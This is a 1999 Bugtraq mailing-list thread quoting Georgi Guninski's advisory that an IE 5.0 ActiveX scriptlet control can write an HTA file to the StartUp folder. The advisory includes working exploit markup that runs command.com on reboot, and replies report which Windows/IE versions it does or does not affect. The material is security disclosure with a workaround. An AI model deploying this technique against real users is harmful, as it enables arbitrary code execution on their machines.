win2000 rc1 build 2072 ie5 doesnt work. ie5.0.2919.800
it reports
security problem and this active x control doesnt allow objects of type blah
blah blah
-----Original Message-----
From: Bugtraq List [mailto:[EMAIL PROTECTED]]On Behalf Of
Micheal Patterson
Sent: August 23, 1999 2:03 AM
To: [EMAIL PROTECTED]
Subject: Re: IE 5.0 allows executing programs
This apparently works on NT 4.0 sp5 and IE 5.00.2014.0216IC as well..
Micheal Patterson
[EMAIL PROTECTED]
----- Original Message -----
From: Georgi Guninski <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Saturday, August 21, 1999 11:17 AM
Subject: IE 5.0 allows executing programs
> Disclaimer:
> The opinions expressed in this advisory and program are my own and not
> of any company.
> The usual standard disclaimer applies, especially the fact that Georgi
> Guninski
> is not liable for any damages caused by direct or indirect use of the
> information or functionality provided by this program.
> Georgi Guninski, bears NO responsibility for content or misuse of this
> program or any derivatives thereof.
>
> Description:
>
> Internet Explorer 5.0 under Windows 95/98 (do not know about NT)
> allows executing arbitrary programs on the local machine by creating and
> overwriting local files and putting content in them.
>
> Details:
>
> The problem is the ActiveX Control "Object for constructing type
> libraries for scriptlets".
> It allows creating and overwriting local files, and more putting content
> in them.
> There is some unneeded information in the file, but part of the content
> may be chosen.
> So, an HTML Application file may be created, feeded with an exploit
> information and written to the StartUp folder.
> The next time the user reboots (which may be forced), the code in the
> HTML Application file will be executed.
> This vulnerability can be exploited via email.
>
> Demonstration is available at: http://www.nat.bg/~joro/scrtlb.html
>
> Workaround:
> Disable Active Scripting
> or
> Disable Run ActiveX Controls and plug-ins
>
> The code is:
>
> <object id="scr"
> classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
> >
> </object>
> <SCRIPT>
> scr.Reset();
> scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
> scr.Doc="<object id='wsh'
>
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert(
'Written
> by Georgi Guninski
> http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
> scr.write();
> </SCRIPT>
> </object>
>
> Regards,
> Georgi Guninski
> http://www.nat.bg/~joro
>
